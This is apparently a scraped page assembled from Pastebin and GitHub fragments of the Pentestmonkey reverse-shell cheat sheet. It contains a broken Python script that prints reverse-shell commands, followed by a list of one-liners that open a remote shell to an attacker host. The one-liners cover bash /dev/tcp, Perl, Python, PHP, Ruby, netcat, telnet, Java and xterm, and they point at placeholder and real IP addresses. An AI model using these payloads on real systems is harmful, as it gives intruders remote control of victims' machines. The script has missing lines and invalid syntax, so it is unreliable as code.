Jan 27th, 2019
Never
Pentestmonkey Oracle Cheat Sheet
Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host. Pentestmonkey Initial commit 8aa37eb May 29, 2015. 2 commits Files Permalink. Failed to load latest commit information.
Pentestmonkey Cheat Sheet 2020
Not a member of Pastebin yet?Sign Up, it unlocks many cool features!
- # http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- import sys
- banner=''--<Pentest-Monkey-Reverse-shell>--
- [1] Bash
- [3] Python
- [5] Netcat
- ''
- def isIp(ip):
- ip_pattern = re.compile('^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$')
- return (port.isdigit and int(port) > 1 and int(port) < 65535)
- def quit(msg):
- exit(0)
- if(len(sys.argv) != 4):
- exit(0)
- shell = sys.argv[1]
- port = sys.argv[3]
- if(shell.isdigit and int(shell)>=1 and int(shell) <= 6) False:
- quit('[!] Invalid IP address given.')
- quit('[!] Invalid port given.')
- shell = int(shell)
- if(shell 1):
- print 'bash -i >& /dev/tcp/%s/%s 0>&1' % (host, port)
- print 'use Socket;$i='%s';$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};' % (host, port)
- print 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('%s',%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);' % (host, port)
- print '$sock=fsockopen('%s',%s);exec('/bin/sh -i <&3 >&3 2>&3');' % (host, port)
- print 'nc -e /bin/sh %s %s' % (host, port)
- print 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f' % (host, port)
RAW Paste Data
reverse-netcat.txt
Pentestmonkey.net Cheat Sheet
On attack host in 'local' active terminal using port 10000 for example: |
nc -l -t -v 8080 |
i.e. attacker$ nc -l -v [ATTACK_HOST_IP] 8080 |
Then On 'remote' victim computer - run this command |
Get this to execute on the victim host ( assuming victim does not have netcat ) |
bash -i >& /dev/tcp/[ATTACK_HOST_IP]/10000 0>&1 |
for example: |
bash -i >& /dev/tcp/54.161.245.60/10000 0>&1 |
UNTESTED variation in comments on https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html |
simple nc variant with two connections: ( untested ? ) |
nc localhost 1233 | /bin/sh | nc 127.0.0.1 1234 |
Netcat |
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p 2>&1 |
Telnet |
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p 2>&1 |
/bin/bash -i >& /dev/tcp/attackerip/4444 0>&1 |
Or for M$ windows: |
nc.exe 192.168.100.113 10000 –e cmd.exe |
As soon as that command is executed, you will have a remote shell on the 'local' terminal window. |
Note: This will be CLEAR TEXT!! |
adopted and updated from |
https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ |
Other resources: |
https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html |
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet |
https://www.gnucitizen.org/blog/reverse-shell-with-bash/ |
http://pentestmonkey.net/tools/web-shells/perl-reverse-shell |
Bash adapted by pentestmonkey from https://www.gnucitizen.org/blog/reverse-shell-with-bash/ |
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 |
small no-feature version of http://pentestmonkey.net/tools/web-shells/perl-reverse-shell |
perl -e 'use Socket;$i='10.0.0.1';$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};' |
Python |
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);' |
PHP |
try fd 4,5,6 if fd 3 is the TCP connection is NOT using file descriptor 3. |
php -r '$sock=fsockopen('10.0.0.1',1234);exec('/bin/sh -i <&3 >&3 2>&3');' |
Ruby |
ruby -rsocket -e'f=TCPSocket.open('10.0.0.1',1234).to_i;exec sprintf('/bin/sh -i <&%d >&%d 2>&%d',f,f,f)' |
NC Netcat ( i.e. AWS Linux 2 ) |
nc -e /bin/sh 10.0.0.1 1234 |
or try this next one from Jeff Price |
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f |
i.e. |
mkfifo mypipe ; cat mypipe|/bin/bash|nc -l -p 6000 >mypipe |
Java untested |
r = Runtime.getRuntime() |
p = r.exec(['/bin/bash','-c','exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done'] as String[]) |
p.waitFor() |
xterm |
xterm -bg black -fg white -display 10.0.0.1:1 |
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). |
One way to do this is with Xnest (to be run on your system): |
Xnest :1 |
You’ll need to authorise the target to connect to you (command also run on your host): |
xhost +targetip |
Pentestmonkey Cheat Sheets
Sign up for freeto join this conversation on GitHub. Already have an account? Sign in to comment